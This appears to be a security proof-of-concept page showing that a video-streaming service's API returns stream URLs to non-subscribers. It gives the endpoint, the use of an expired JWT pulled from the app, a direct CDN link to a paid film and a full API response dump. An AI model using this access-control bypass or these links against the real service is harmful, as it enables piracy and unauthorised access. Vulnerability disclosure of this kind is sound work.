SECURITY RESEARCH PoC  |  The video below plays from Munowatch CDN with NO valid subscription — server-side entitlement not enforced
SECURITY PoC — NO AUTH
THIS MOVIE'S CDN STREAM — No subscription, no login, no auth token required
Per-movie CDN bypass proof:
The API returned playingUrl for Mischief Night with issubscriber: false, user_access: deny, and paid_for: true.
The video_name + serverhost from the API response are used to construct the CDN URL above — confirming that the CDN file for this specific movie is publicly accessible with no authentication.
Mischief Night
Vj Emmy Horror 01h 25m 4 years ago

Young Emily Walton, who has suffered from psychosomatic blindness ever since the car accident that took her mother's life, must summon every instinct at her disposal to protect herself and her loved ones from a mysterious intruder.

 API Response Evidence — Vulnerability Proof
Endpoint called GET /api/preview/v2/30375/0
User ID used 0 (no user / not logged in)
JWT used Expired Feb 2024 (extracted from APK)
issubscriber false
user_access deny
paid_for YES (premium content)
substatus EXPIRED
serverhost 43
video_name mischief night.mp4
playingUrl returned YES — URL in response
API playingUrl value https://munowatch.co/clips/ELI.mp4
CDN stream https://munotech2.b-cdn.net/af50/hger/mischief%20night.mp4

Finding: The server sets user_access=deny and issubscriber=false but still returns playingUrl in the same response. Subscription is enforced client-side only — any caller with the expired APK JWT can obtain stream URLs without a subscription. Munowatch CDN (b-cdn.net) serves content with no auth required (direct HTTP Range requests succeed with HTTP 206).

{
    "id": 30375,
    "video_title": "Mischief Night",
    "description": " Young Emily Walton, who has suffered from psychosomatic blindness ever since the car accident that took her mother's life, must summon every instinct at her disposal to protect herself and her loved ones from a mysterious intruder.",
    "video_name": "mischief night.mp4",
    "filehistory": "",
    "openload": "0",
    "embedurl": "",
    "serverhost": "43",
    "allow_openload": "0",
    "full_video_name": "",
    "duration": "01h 25m",
    "thumbnail": "https://apposters.b-cdn.net/laba/yo/naki/ZFGI3WsZ844031.jpg",
    "tfilehistory": "",
    "category_id": 2,
    "language_id": 1,
    "recording_date": "2022-11-17",
    "age_id": "18 +",
    "location": 1,
    "tab_category_id": 2,
    "series_code": "30375",
    "access": "1",
    "paid_for": "1",
    "new_movie": "1",
    "priority": "No",
    "size": "798.85 MB",
    "create_date": "2022-11-17 12:24:26",
    "schedule_date": null,
    "user_id": 1118356,
    "vj_id": 2,
    "video_status_id": 0,
    "network_id": "45.221.8.174",
    "user_access": "deny",
    "notification": "No",
    "secduration": "5106.000000",
    "issubscriber": false,
    "genre": "Horror",
    "vjname": "Vj Emmy",
    "trailer_playing_url": "",
    "episodes": 0,
    "episode_state": "",
    "nxt_eps": "",
    "nxt_eps_id": 0,
    "nxt_eps_title": "",
    "nxt_ldur": 0,
    "nxt_playing_url": "https://munowatch.co/clips/ELI.mp4",
    "playingUrl": "https://munowatch.co/clips/ELI.mp4",
    "ldur": 0,
    "session_id": "cb99afb5b31411a57538a97393de0e2e",
    "device": "web",
    "lang_name": "English to Luganda",
    "vjrelease": "4 years ago",
    "mstatus": false,
    "kstatus": "",
    "substatus": "EXPIRED"
}